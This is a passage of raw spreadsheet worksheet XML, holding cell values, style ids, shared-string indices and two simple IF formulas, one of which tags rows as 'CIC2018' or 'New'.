      <c r="LA3" s="171">
        <v>0</v>
      </c>
      <c r="LB3" s="500">
        <v>0</v>
      </c>
      <c r="LC3" s="172">
        <v>0</v>
      </c>
      <c r="LD3" s="172">
        <v>0</v>
      </c>
      <c r="LE3" s="173">
        <v>0</v>
      </c>
      <c r="LF3" s="174">
        <v>0</v>
      </c>
      <c r="LG3" s="175">
        <v>0</v>
      </c>
      <c r="LH3" s="502">
        <v>0</v>
      </c>
      <c r="LI3" s="176">
        <v>0</v>
      </c>
      <c r="LJ3" s="176">
        <v>0</v>
      </c>
      <c r="LK3" s="122">
        <v>0</v>
      </c>
      <c r="LL3" s="177">
        <v>2</v>
      </c>
      <c r="LM3" s="506">
        <v>2</v>
      </c>
      <c r="LN3" s="179">
        <v>1</v>
      </c>
      <c r="LO3" s="179">
        <v>1</v>
      </c>
      <c r="LP3" s="179">
        <v>1</v>
      </c>
      <c r="LQ3" s="179">
        <v>1</v>
      </c>
      <c r="LR3" s="179">
        <v>1</v>
      </c>
      <c r="LS3" s="179">
        <v>1</v>
      </c>
      <c r="LT3" s="376"/>
      <c r="LU3" s="177">
        <v>0</v>
      </c>
      <c r="LV3" s="178">
        <v>0</v>
      </c>
      <c r="LW3" s="506">
        <v>0</v>
      </c>
      <c r="LX3" s="179">
        <v>0</v>
      </c>
      <c r="LY3" s="179">
        <v>0</v>
      </c>
      <c r="LZ3" s="179">
        <v>0</v>
      </c>
      <c r="MA3" s="177">
        <v>0</v>
      </c>
      <c r="MB3" s="178">
        <v>0</v>
      </c>
      <c r="MC3" s="506">
        <v>0</v>
      </c>
      <c r="MD3" s="179">
        <v>0</v>
      </c>
      <c r="ME3" s="179">
        <v>0</v>
      </c>
      <c r="MF3" s="179">
        <v>0</v>
      </c>
      <c r="MG3" s="177">
        <v>0</v>
      </c>
      <c r="MH3" s="178">
        <v>0</v>
      </c>
      <c r="MI3" s="506">
        <v>0</v>
      </c>
      <c r="MJ3" s="179">
        <v>0</v>
      </c>
      <c r="MK3" s="179">
        <v>0</v>
      </c>
      <c r="ML3" s="179">
        <v>0</v>
      </c>
      <c r="MM3" s="177">
        <v>1</v>
      </c>
      <c r="MN3" s="178" t="s">
        <v>4152</v>
      </c>
      <c r="MO3" s="506">
        <v>1</v>
      </c>
      <c r="MP3" s="179" t="s">
        <v>2501</v>
      </c>
      <c r="MQ3" s="179">
        <v>1</v>
      </c>
      <c r="MR3" s="179">
        <v>1</v>
      </c>
      <c r="MS3" s="177">
        <v>0</v>
      </c>
      <c r="MT3" s="178">
        <v>0</v>
      </c>
      <c r="MU3" s="506">
        <v>0</v>
      </c>
      <c r="MV3" s="179">
        <v>0</v>
      </c>
      <c r="MW3" s="179">
        <v>0</v>
      </c>
      <c r="MX3" s="179">
        <v>0</v>
      </c>
      <c r="MY3" s="177">
        <v>0</v>
      </c>
      <c r="MZ3" s="178">
        <v>0</v>
      </c>
      <c r="NA3" s="506">
        <v>0</v>
      </c>
      <c r="NB3" s="179">
        <v>0</v>
      </c>
      <c r="NC3" s="179">
        <v>0</v>
      </c>
      <c r="ND3" s="179">
        <v>0</v>
      </c>
      <c r="NE3" s="177">
        <v>0</v>
      </c>
      <c r="NF3" s="178">
        <v>0</v>
      </c>
      <c r="NG3" s="506">
        <v>0</v>
      </c>
      <c r="NH3" s="179">
        <v>0</v>
      </c>
      <c r="NI3" s="179">
        <v>0</v>
      </c>
      <c r="NJ3" s="179">
        <v>0</v>
      </c>
      <c r="NK3" s="177">
        <v>0</v>
      </c>
      <c r="NL3" s="178">
        <v>0</v>
      </c>
      <c r="NM3" s="506">
        <v>0</v>
      </c>
      <c r="NN3" s="179">
        <v>0</v>
      </c>
      <c r="NO3" s="179">
        <v>0</v>
      </c>
      <c r="NP3" s="179">
        <v>0</v>
      </c>
      <c r="NQ3" s="177">
        <v>0</v>
      </c>
      <c r="NR3" s="178">
        <v>0</v>
      </c>
      <c r="NS3" s="506">
        <v>0</v>
      </c>
      <c r="NT3" s="179">
        <v>0</v>
      </c>
      <c r="NU3" s="179">
        <v>0</v>
      </c>
      <c r="NV3" s="179">
        <v>0</v>
      </c>
      <c r="NW3" s="177">
        <v>1</v>
      </c>
      <c r="NX3" s="178" t="s">
        <v>4314</v>
      </c>
      <c r="NY3" s="506">
        <v>1</v>
      </c>
      <c r="NZ3" s="179" t="s">
        <v>2502</v>
      </c>
      <c r="OA3" s="179">
        <v>1</v>
      </c>
      <c r="OB3" s="179">
        <v>1</v>
      </c>
      <c r="OC3" s="180">
        <v>1</v>
      </c>
      <c r="OD3" s="180">
        <v>1</v>
      </c>
      <c r="OE3" s="181">
        <v>1</v>
      </c>
      <c r="OF3" s="181">
        <v>1</v>
      </c>
      <c r="OG3" s="181">
        <v>1</v>
      </c>
      <c r="OH3" s="181">
        <v>1</v>
      </c>
      <c r="OI3" s="181">
        <v>1</v>
      </c>
      <c r="OJ3" s="181">
        <v>1</v>
      </c>
      <c r="OK3" s="377"/>
      <c r="OL3" s="180">
        <v>1</v>
      </c>
      <c r="OM3" s="181">
        <v>1</v>
      </c>
      <c r="ON3" s="181">
        <v>1</v>
      </c>
      <c r="OO3" s="181" t="s">
        <v>2503</v>
      </c>
      <c r="OP3" s="181">
        <v>1</v>
      </c>
      <c r="OQ3" s="463">
        <v>1</v>
      </c>
      <c r="OR3" s="180">
        <v>0</v>
      </c>
      <c r="OS3" s="181">
        <v>0</v>
      </c>
      <c r="OT3" s="181">
        <v>0</v>
      </c>
      <c r="OU3" s="181"/>
      <c r="OV3" s="181">
        <v>0</v>
      </c>
      <c r="OW3" s="463">
        <v>0</v>
      </c>
      <c r="OX3" s="180">
        <v>0</v>
      </c>
      <c r="OY3" s="181">
        <v>0</v>
      </c>
      <c r="OZ3" s="181">
        <v>0</v>
      </c>
      <c r="PA3" s="181"/>
      <c r="PB3" s="181">
        <v>0</v>
      </c>
      <c r="PC3" s="463">
        <v>0</v>
      </c>
      <c r="PD3" s="180">
        <v>0</v>
      </c>
      <c r="PE3" s="181">
        <v>0</v>
      </c>
      <c r="PF3" s="181">
        <v>0</v>
      </c>
      <c r="PG3" s="181"/>
      <c r="PH3" s="181">
        <v>0</v>
      </c>
      <c r="PI3" s="463">
        <v>0</v>
      </c>
      <c r="PJ3" s="180">
        <v>0</v>
      </c>
      <c r="PK3" s="181">
        <v>0</v>
      </c>
      <c r="PL3" s="181">
        <v>0</v>
      </c>
      <c r="PM3" s="181"/>
      <c r="PN3" s="181">
        <v>0</v>
      </c>
      <c r="PO3" s="463">
        <v>0</v>
      </c>
      <c r="PP3" s="180">
        <v>0</v>
      </c>
      <c r="PQ3" s="181">
        <v>0</v>
      </c>
      <c r="PR3" s="181">
        <v>0</v>
      </c>
      <c r="PS3" s="181"/>
      <c r="PT3" s="181">
        <v>0</v>
      </c>
      <c r="PU3" s="463">
        <v>0</v>
      </c>
      <c r="PV3" s="180">
        <v>0</v>
      </c>
      <c r="PW3" s="181">
        <v>0</v>
      </c>
      <c r="PX3" s="181">
        <v>0</v>
      </c>
      <c r="PY3" s="181"/>
      <c r="PZ3" s="181">
        <v>0</v>
      </c>
      <c r="QA3" s="463">
        <v>0</v>
      </c>
      <c r="QB3" s="180">
        <v>0</v>
      </c>
      <c r="QC3" s="181">
        <v>0</v>
      </c>
      <c r="QD3" s="181">
        <v>0</v>
      </c>
      <c r="QE3" s="181"/>
      <c r="QF3" s="181">
        <v>0</v>
      </c>
      <c r="QG3" s="463">
        <v>0</v>
      </c>
      <c r="QH3" s="180">
        <v>1</v>
      </c>
      <c r="QI3" s="181">
        <v>1</v>
      </c>
      <c r="QJ3" s="181">
        <v>1</v>
      </c>
      <c r="QK3" s="181" t="s">
        <v>1561</v>
      </c>
      <c r="QL3" s="181">
        <v>1</v>
      </c>
      <c r="QM3" s="463">
        <v>1</v>
      </c>
      <c r="QN3" s="180">
        <v>0</v>
      </c>
      <c r="QO3" s="181">
        <v>0</v>
      </c>
      <c r="QP3" s="181">
        <v>0</v>
      </c>
      <c r="QQ3" s="181"/>
      <c r="QR3" s="181">
        <v>0</v>
      </c>
      <c r="QS3" s="463">
        <v>0</v>
      </c>
      <c r="QT3" s="124"/>
      <c r="QU3" s="124"/>
      <c r="QV3" s="124"/>
      <c r="QW3" s="124"/>
      <c r="QX3" s="124"/>
      <c r="QY3" s="124"/>
      <c r="QZ3" s="124"/>
      <c r="RA3" s="124"/>
      <c r="RB3" s="124"/>
      <c r="RC3" s="124"/>
      <c r="RD3" s="124"/>
      <c r="RE3" s="124"/>
      <c r="RF3" s="124"/>
      <c r="RG3" s="124"/>
      <c r="RH3" s="124"/>
      <c r="RI3" s="124"/>
      <c r="RJ3" s="124"/>
      <c r="RK3" s="124"/>
      <c r="RL3" s="124"/>
      <c r="RM3" s="124"/>
      <c r="RN3" s="124"/>
      <c r="RO3" s="124"/>
      <c r="RP3" s="124"/>
      <c r="RQ3" s="124"/>
      <c r="RR3" s="124"/>
      <c r="RS3" s="124"/>
      <c r="RT3" s="124"/>
      <c r="RU3" s="124"/>
      <c r="RV3" s="124"/>
      <c r="RW3" s="124"/>
      <c r="RX3" s="124"/>
      <c r="RY3" s="124"/>
      <c r="RZ3" s="124"/>
      <c r="SA3" s="124"/>
      <c r="SB3" s="124"/>
      <c r="SC3" s="124"/>
      <c r="SD3" s="124"/>
      <c r="SE3" s="124"/>
      <c r="SF3" s="124"/>
      <c r="SG3" s="124"/>
      <c r="SH3" s="124"/>
      <c r="SI3" s="124"/>
      <c r="SJ3" s="124"/>
      <c r="SK3" s="124"/>
      <c r="SL3" s="124"/>
      <c r="SM3" s="124"/>
      <c r="SN3" s="124"/>
      <c r="SO3" s="124"/>
      <c r="SP3" s="124"/>
      <c r="SQ3" s="124"/>
      <c r="SR3" s="124"/>
      <c r="SS3" s="124"/>
      <c r="ST3" s="124"/>
      <c r="SU3" s="124"/>
      <c r="SV3" s="124"/>
      <c r="SW3" s="124"/>
      <c r="SX3" s="124"/>
      <c r="SY3" s="124"/>
      <c r="SZ3" s="124"/>
      <c r="TA3" s="124"/>
      <c r="TB3" s="124"/>
      <c r="TC3" s="124"/>
      <c r="TD3" s="124"/>
      <c r="TE3" s="124"/>
      <c r="TF3" s="124"/>
      <c r="TG3" s="124"/>
      <c r="TH3" s="124"/>
      <c r="TI3" s="124"/>
      <c r="TJ3" s="124"/>
      <c r="TK3" s="124"/>
      <c r="TL3" s="124"/>
      <c r="TM3" s="124"/>
      <c r="TN3" s="124"/>
      <c r="TO3" s="124"/>
      <c r="TP3" s="124"/>
      <c r="TQ3" s="124"/>
      <c r="TR3" s="124"/>
      <c r="TS3" s="124"/>
      <c r="TT3" s="124"/>
      <c r="TU3" s="124"/>
      <c r="TV3" s="124"/>
      <c r="TW3" s="124"/>
      <c r="TX3" s="124"/>
      <c r="TY3" s="124"/>
      <c r="TZ3" s="124"/>
      <c r="UA3" s="124"/>
      <c r="UB3" s="124"/>
      <c r="UC3" s="124"/>
      <c r="UD3" s="124"/>
      <c r="UE3" s="124"/>
      <c r="UF3" s="124"/>
      <c r="UG3" s="124"/>
      <c r="UH3" s="124"/>
      <c r="UI3" s="124"/>
      <c r="UJ3" s="124"/>
      <c r="UK3" s="124"/>
      <c r="UL3" s="124"/>
      <c r="UM3" s="124"/>
      <c r="UN3" s="124"/>
      <c r="UO3" s="124"/>
      <c r="UP3" s="124"/>
      <c r="UQ3" s="124"/>
      <c r="UR3" s="124"/>
      <c r="US3" s="124"/>
      <c r="UT3" s="124"/>
      <c r="UU3" s="124"/>
      <c r="UV3" s="124"/>
      <c r="UW3" s="124"/>
      <c r="UX3" s="124"/>
      <c r="UY3" s="124"/>
      <c r="UZ3" s="124"/>
      <c r="VA3" s="124"/>
      <c r="VB3" s="124"/>
      <c r="VC3" s="124"/>
      <c r="VD3" s="124"/>
      <c r="VE3" s="124"/>
      <c r="VF3" s="124"/>
      <c r="VG3" s="124"/>
      <c r="VH3" s="124"/>
      <c r="VI3" s="124"/>
      <c r="VJ3" s="124"/>
      <c r="VK3" s="124"/>
      <c r="VL3" s="124"/>
      <c r="VM3" s="124"/>
      <c r="VN3" s="124"/>
      <c r="VO3" s="124"/>
      <c r="VP3" s="124"/>
      <c r="VQ3" s="124"/>
      <c r="VR3" s="124"/>
      <c r="VS3" s="124"/>
      <c r="VT3" s="124"/>
      <c r="VU3" s="124"/>
      <c r="VV3" s="124"/>
      <c r="VW3" s="124"/>
      <c r="VX3" s="124"/>
      <c r="VY3" s="124"/>
    </row>
    <row r="4" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A4" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D4" s="83" t="s">
        <v>6</v>
      </c>
      <c r="E4" s="83">
        <f>IF(F4=F3,E3,E3+1)</f>
        <v>1</v>
      </c>
      <c r="F4" s="83" t="s">
        <v>7</v>
      </c>
      <c r="G4" s="94" t="s">
        <v>757</v>
      </c>
      <c r="H4" s="83" t="s">
        <v>758</v>
      </c>
      <c r="I4" s="81" t="s">
        <v>759</v>
      </c>
      <c r="J4" s="85" t="s">
        <v>760</v>
      </c>
      <c r="K4" s="81" t="s">
        <v>761</v>
      </c>
      <c r="L4" s="81" t="s">
        <v>762</v>
      </c>
      <c r="M4" s="378" t="s">
        <v>181</v>
      </c>
      <c r="N4" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O4" s="485" t="str">
        <f t="shared" ref="O4:O67" si="1">IF(ISNUMBER(SEARCH("C2018",L4)),"CIC2018","New")</f>
        <v>New</v>
      </c>
      <c r="P4" s="91"/>
      <c r="Q4" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R4" s="92" t="s">
        <v>763</v>
      </c>
      <c r="S4" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T4" s="92" t="s">
        <v>764</v>
      </c>
      <c r="U4" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V4" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W4" s="96" t="s">
        <v>765</v>
      </c>
      <c r="X4" s="97" t="s">
        <v>766</v>
      </c>
      <c r="Y4" s="83" t="s">
        <v>767</v>
      </c>
      <c r="Z4" s="98" t="s">
        <v>768</v>
      </c>
      <c r="AA4" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB4" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC4" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD4" s="83"/>
      <c r="AE4" s="83"/>
      <c r="AF4" s="380" t="s">
        <v>745</v>
      </c>
      <c r="AG4" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH4" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI4" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ4" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK4" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL4" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM4" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN4" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO4" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP4" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ4" s="358">
        <v>1</v>
      </c>
      <c r="AR4" s="100"/>
      <c r="AS4" s="100">
        <v>1</v>
      </c>
      <c r="AT4" s="100">
        <v>0</v>
      </c>
      <c r="AU4" s="100">
        <v>1</v>
      </c>
      <c r="AV4" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW4" s="100">
        <v>1</v>
      </c>
      <c r="AX4" s="100">
        <v>1</v>
      </c>
      <c r="AY4" s="100">
        <v>0</v>
      </c>
      <c r="AZ4" s="100">
        <v>1</v>
      </c>
      <c r="BA4" s="381"/>
      <c r="BB4" s="101">
        <v>3</v>
      </c>
      <c r="BC4" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="BD4" s="102">
        <v>3</v>
      </c>
      <c r="BE4" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="BF4" s="103">
        <v>3</v>
      </c>
      <c r="BG4" s="104">
        <v>1</v>
      </c>
      <c r="BH4" s="105">
        <v>0</v>
      </c>
      <c r="BI4" s="106">
        <v>0</v>
      </c>
      <c r="BJ4" s="497">
        <v>0</v>
      </c>
      <c r="BK4" s="107">
        <v>0</v>
      </c>
      <c r="BL4" s="107">
        <v>0</v>
      </c>
      <c r="BM4" s="108">
        <v>0</v>
      </c>
      <c r="BN4" s="109">
        <v>3</v>
      </c>
      <c r="BO4" s="110" t="s">
        <v>1787</v>
      </c>
      <c r="BP4" s="501">
        <v>3</v>
      </c>
      <c r="BQ4" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="BR4" s="111">
        <v>3</v>
      </c>
      <c r="BS4" s="112">
        <v>1</v>
      </c>
      <c r="BT4" s="113">
        <v>3</v>
      </c>
      <c r="BU4" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="BV4" s="503">
        <v>3</v>
      </c>
      <c r="BW4" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="BX4" s="115">
        <v>3</v>
      </c>
      <c r="BY4" s="116">
        <v>1</v>
      </c>
      <c r="BZ4" s="250">
        <v>4</v>
      </c>
      <c r="CA4" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="CB4" s="505">
        <v>2</v>
      </c>
      <c r="CC4" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="CD4" s="252">
        <v>2</v>
      </c>
      <c r="CE4" s="253">
        <v>1</v>
      </c>
      <c r="CF4" s="101">
        <v>7</v>
      </c>
      <c r="CG4" s="102" t="s">
        <v>2504</v>
      </c>
      <c r="CH4" s="102">
        <v>5</v>
      </c>
      <c r="CI4" s="103" t="s">
        <v>2505</v>
      </c>
      <c r="CJ4" s="103">
        <v>5</v>
      </c>
      <c r="CK4" s="104">
        <v>1</v>
      </c>
      <c r="CL4" s="105">
        <v>0</v>
      </c>
      <c r="CM4" s="106">
        <v>0</v>
      </c>
      <c r="CN4" s="497">
        <v>0</v>
      </c>
      <c r="CO4" s="107">
        <v>0</v>
      </c>
      <c r="CP4" s="107">
        <v>0</v>
      </c>
      <c r="CQ4" s="108">
        <v>0</v>
      </c>
      <c r="CR4" s="109">
        <v>0</v>
      </c>
      <c r="CS4" s="110">
        <v>0</v>
      </c>
      <c r="CT4" s="501">
        <v>0</v>
      </c>
      <c r="CU4" s="111">
        <v>0</v>
      </c>
      <c r="CV4" s="111">
        <v>0</v>
      </c>
      <c r="CW4" s="112">
        <v>0</v>
      </c>
      <c r="CX4" s="113">
        <v>3</v>
      </c>
      <c r="CY4" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="CZ4" s="503">
        <v>3</v>
      </c>
      <c r="DA4" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="DB4" s="115">
        <v>3</v>
      </c>
      <c r="DC4" s="116">
        <v>1</v>
      </c>
      <c r="DD4" s="101">
        <v>0</v>
      </c>
      <c r="DE4" s="102">
        <v>0</v>
      </c>
      <c r="DF4" s="102">
        <v>0</v>
      </c>
      <c r="DG4" s="103">
        <v>0</v>
      </c>
      <c r="DH4" s="103">
        <v>0</v>
      </c>
      <c r="DI4" s="104">
        <v>0</v>
      </c>
      <c r="DJ4" s="105">
        <v>0</v>
      </c>
      <c r="DK4" s="106">
        <v>0</v>
      </c>
      <c r="DL4" s="497">
        <v>0</v>
      </c>
      <c r="DM4" s="107">
        <v>0</v>
      </c>
      <c r="DN4" s="107">
        <v>0</v>
      </c>
      <c r="DO4" s="108">
        <v>0</v>
      </c>
      <c r="DP4" s="109">
        <v>0</v>
      </c>
      <c r="DQ4" s="110">
        <v>0</v>
      </c>
      <c r="DR4" s="501">
        <v>0</v>
      </c>
      <c r="DS4" s="111">
        <v>0</v>
      </c>
      <c r="DT4" s="111">
        <v>0</v>
      </c>
      <c r="DU4" s="112">
        <v>0</v>
      </c>
      <c r="DV4" s="113">
        <v>0</v>
      </c>
      <c r="DW4" s="114">
        <v>0</v>
      </c>
      <c r="DX4" s="503">
        <v>0</v>
      </c>
      <c r="DY4" s="115">
        <v>0</v>
      </c>
      <c r="DZ4" s="115">
        <v>0</v>
      </c>
      <c r="EA4" s="116">
        <v>0</v>
      </c>
      <c r="EB4" s="250">
        <v>0</v>
      </c>
      <c r="EC4" s="251">
        <v>0</v>
      </c>
      <c r="ED4" s="505">
        <v>0</v>
      </c>
      <c r="EE4" s="252">
        <v>0</v>
      </c>
      <c r="EF4" s="252">
        <v>0</v>
      </c>
      <c r="EG4" s="253">
        <v>0</v>
      </c>
      <c r="EH4" s="101">
        <v>0</v>
      </c>
      <c r="EI4" s="102">
        <v>0</v>
      </c>
      <c r="EJ4" s="102">
        <v>0</v>
      </c>
      <c r="EK4" s="103">
        <v>0</v>
      </c>
      <c r="EL4" s="103">
        <v>0</v>
      </c>
      <c r="EM4" s="104">
        <v>0</v>
      </c>
      <c r="EN4" s="105">
        <v>0</v>
      </c>
      <c r="EO4" s="106">
        <v>0</v>
      </c>
      <c r="EP4" s="497">
        <v>0</v>
      </c>
      <c r="EQ4" s="107">
        <v>0</v>
      </c>
      <c r="ER4" s="107">
        <v>0</v>
      </c>
      <c r="ES4" s="108">
        <v>0</v>
      </c>
      <c r="ET4" s="109">
        <v>0</v>
      </c>
      <c r="EU4" s="110">
        <v>0</v>
      </c>
      <c r="EV4" s="501">
        <v>0</v>
      </c>
      <c r="EW4" s="111">
        <v>0</v>
      </c>
      <c r="EX4" s="111">
        <v>0</v>
      </c>
      <c r="EY4" s="112">
        <v>0</v>
      </c>
      <c r="EZ4" s="113">
        <v>0</v>
      </c>
      <c r="FA4" s="114">
        <v>0</v>
      </c>
      <c r="FB4" s="503">
        <v>0</v>
      </c>
      <c r="FC4" s="115">
        <v>0</v>
      </c>
      <c r="FD4" s="115">
        <v>0</v>
      </c>
      <c r="FE4" s="116">
        <v>0</v>
      </c>
      <c r="FF4" s="101">
        <v>0</v>
      </c>
      <c r="FG4" s="102">
        <v>0</v>
      </c>
      <c r="FH4" s="102">
        <v>0</v>
      </c>
      <c r="FI4" s="103">
        <v>0</v>
      </c>
      <c r="FJ4" s="103">
        <v>0</v>
      </c>
      <c r="FK4" s="104">
        <v>0</v>
      </c>
      <c r="FL4" s="105">
        <v>0</v>
      </c>
      <c r="FM4" s="106">
        <v>0</v>
      </c>
      <c r="FN4" s="497">
        <v>0</v>
      </c>
      <c r="FO4" s="107">
        <v>0</v>
      </c>
      <c r="FP4" s="107">
        <v>0</v>
      </c>
      <c r="FQ4" s="108">
        <v>0</v>
      </c>
      <c r="FR4" s="109">
        <v>0</v>
      </c>
      <c r="FS4" s="110">
        <v>0</v>
      </c>
      <c r="FT4" s="501">
        <v>0</v>
      </c>
      <c r="FU4" s="111">
        <v>0</v>
      </c>
      <c r="FV4" s="111">
        <v>0</v>
      </c>
      <c r="FW4" s="112">
        <v>0</v>
      </c>
      <c r="FX4" s="113">
        <v>0</v>
      </c>
      <c r="FY4" s="114">
        <v>0</v>
      </c>
      <c r="FZ4" s="503">
        <v>0</v>
      </c>
      <c r="GA4" s="115">
        <v>0</v>
      </c>
      <c r="GB4" s="115">
        <v>0</v>
      </c>
      <c r="GC4" s="116">
        <v>0</v>
      </c>
      <c r="GD4" s="250">
        <v>4</v>
      </c>
      <c r="GE4" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF4" s="505">
        <v>2</v>
      </c>
      <c r="GG4" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH4" s="252">
        <v>2</v>
      </c>
      <c r="GI4" s="253">
        <v>1</v>
      </c>
      <c r="GJ4" s="101">
        <v>4</v>
      </c>
      <c r="GK4" s="102" t="s">
        <v>1902</v>
      </c>
      <c r="GL4" s="102">
        <v>2</v>
      </c>
      <c r="GM4" s="103" t="s">
        <v>1903</v>
      </c>
      <c r="GN4" s="103">
        <v>2</v>
      </c>
      <c r="GO4" s="104">
        <v>1</v>
      </c>
      <c r="GP4" s="105">
        <v>0</v>
      </c>
      <c r="GQ4" s="106">
        <v>0</v>
      </c>
      <c r="GR4" s="497">
        <v>0</v>
      </c>
      <c r="GS4" s="107">
        <v>0</v>
      </c>
      <c r="GT4" s="107">
        <v>0</v>
      </c>
      <c r="GU4" s="108">
        <v>0</v>
      </c>
      <c r="GV4" s="109">
        <v>0</v>
      </c>
      <c r="GW4" s="110">
        <v>0</v>
      </c>
      <c r="GX4" s="501">
        <v>0</v>
      </c>
      <c r="GY4" s="111">
        <v>0</v>
      </c>
      <c r="GZ4" s="111">
        <v>0</v>
      </c>
      <c r="HA4" s="112">
        <v>0</v>
      </c>
      <c r="HB4" s="113">
        <v>0</v>
      </c>
      <c r="HC4" s="114">
        <v>0</v>
      </c>
      <c r="HD4" s="503">
        <v>0</v>
      </c>
      <c r="HE4" s="115">
        <v>0</v>
      </c>
      <c r="HF4" s="115">
        <v>0</v>
      </c>
      <c r="HG4" s="116">
        <v>0</v>
      </c>
      <c r="HH4" s="101">
        <v>3</v>
      </c>
      <c r="HI4" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="HJ4" s="102">
        <v>3</v>
      </c>
      <c r="HK4" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL4" s="103">
        <v>3</v>
      </c>
      <c r="HM4" s="104">
        <v>1</v>
      </c>
      <c r="HN4" s="105">
        <v>0</v>
      </c>
      <c r="HO4" s="106">
        <v>0</v>
      </c>
      <c r="HP4" s="497">
        <v>0</v>
      </c>
      <c r="HQ4" s="107">
        <v>0</v>
      </c>
      <c r="HR4" s="107">
        <v>0</v>
      </c>
      <c r="HS4" s="108">
        <v>0</v>
      </c>
      <c r="HT4" s="109">
        <v>3</v>
      </c>
      <c r="HU4" s="110" t="s">
        <v>1787</v>
      </c>
      <c r="HV4" s="501">
        <v>3</v>
      </c>
      <c r="HW4" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="HX4" s="111">
        <v>3</v>
      </c>
      <c r="HY4" s="112">
        <v>1</v>
      </c>
      <c r="HZ4" s="113">
        <v>3</v>
      </c>
      <c r="IA4" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="IB4" s="503">
        <v>3</v>
      </c>
      <c r="IC4" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID4" s="115">
        <v>3</v>
      </c>
      <c r="IE4" s="116">
        <v>1</v>
      </c>
      <c r="IF4" s="250">
        <v>0</v>
      </c>
      <c r="IG4" s="251">
        <v>0</v>
      </c>
      <c r="IH4" s="505">
        <v>0</v>
      </c>
      <c r="II4" s="252">
        <v>0</v>
      </c>
      <c r="IJ4" s="252">
        <v>0</v>
      </c>
      <c r="IK4" s="253">
        <v>0</v>
      </c>
      <c r="IL4" s="101">
        <v>3</v>
      </c>
      <c r="IM4" s="102" t="s">
        <v>1787</v>
      </c>
      <c r="IN4" s="102">
        <v>3</v>
      </c>
      <c r="IO4" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="IP4" s="103">
        <v>3</v>
      </c>
      <c r="IQ4" s="104">
        <v>1</v>
      </c>
      <c r="IR4" s="105">
        <v>0</v>
      </c>
      <c r="IS4" s="106">
        <v>0</v>
      </c>
      <c r="IT4" s="497">
        <v>0</v>
      </c>
      <c r="IU4" s="107">
        <v>0</v>
      </c>
      <c r="IV4" s="107">
        <v>0</v>
      </c>
      <c r="IW4" s="108">
        <v>0</v>
      </c>
      <c r="IX4" s="109">
        <v>0</v>
      </c>
      <c r="IY4" s="110">
        <v>0</v>
      </c>
      <c r="IZ4" s="501">
        <v>0</v>
      </c>
      <c r="JA4" s="111">
        <v>0</v>
      </c>
      <c r="JB4" s="111">
        <v>0</v>
      </c>
      <c r="JC4" s="112">
        <v>0</v>
      </c>
      <c r="JD4" s="113">
        <v>3</v>
      </c>
      <c r="JE4" s="114" t="s">
        <v>1787</v>
      </c>
      <c r="JF4" s="503">
        <v>3</v>
      </c>
      <c r="JG4" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="JH4" s="115">
        <v>3</v>
      </c>
      <c r="JI4" s="116">
        <v>1</v>
      </c>
      <c r="JJ4" s="101">
        <v>0</v>
      </c>
      <c r="JK4" s="102">
        <v>0</v>
      </c>
      <c r="JL4" s="102">
        <v>0</v>
      </c>
      <c r="JM4" s="103">
        <v>0</v>
      </c>
      <c r="JN4" s="103">
        <v>0</v>
      </c>
      <c r="JO4" s="104">
        <v>0</v>
      </c>
      <c r="JP4" s="105">
        <v>0</v>
      </c>
      <c r="JQ4" s="106">
        <v>0</v>
      </c>
      <c r="JR4" s="497">
        <v>0</v>
      </c>
      <c r="JS4" s="107">
        <v>0</v>
      </c>
      <c r="JT4" s="107">
        <v>0</v>
      </c>
      <c r="JU4" s="108">
        <v>0</v>
      </c>
      <c r="JV4" s="109">
        <v>0</v>
      </c>
      <c r="JW4" s="110">
        <v>0</v>
      </c>
      <c r="JX4" s="501">
        <v>0</v>
      </c>
      <c r="JY4" s="111">
        <v>0</v>
      </c>
      <c r="JZ4" s="111">
        <v>0</v>
      </c>
      <c r="KA4" s="112">
        <v>0</v>
      </c>
      <c r="KB4" s="113">
        <v>0</v>
      </c>
      <c r="KC4" s="114">
        <v>0</v>
      </c>
      <c r="KD4" s="503">
        <v>0</v>
      </c>
      <c r="KE4" s="115">
        <v>0</v>
      </c>
      <c r="KF4" s="115">
        <v>0</v>
      </c>
      <c r="KG4" s="116">
        <v>0</v>
      </c>
      <c r="KH4" s="250">
        <v>0</v>
      </c>
      <c r="KI4" s="251">
        <v>0</v>
      </c>
      <c r="KJ4" s="505">
        <v>0</v>
      </c>
      <c r="KK4" s="252">
        <v>0</v>
      </c>
      <c r="KL4" s="252">
        <v>0</v>
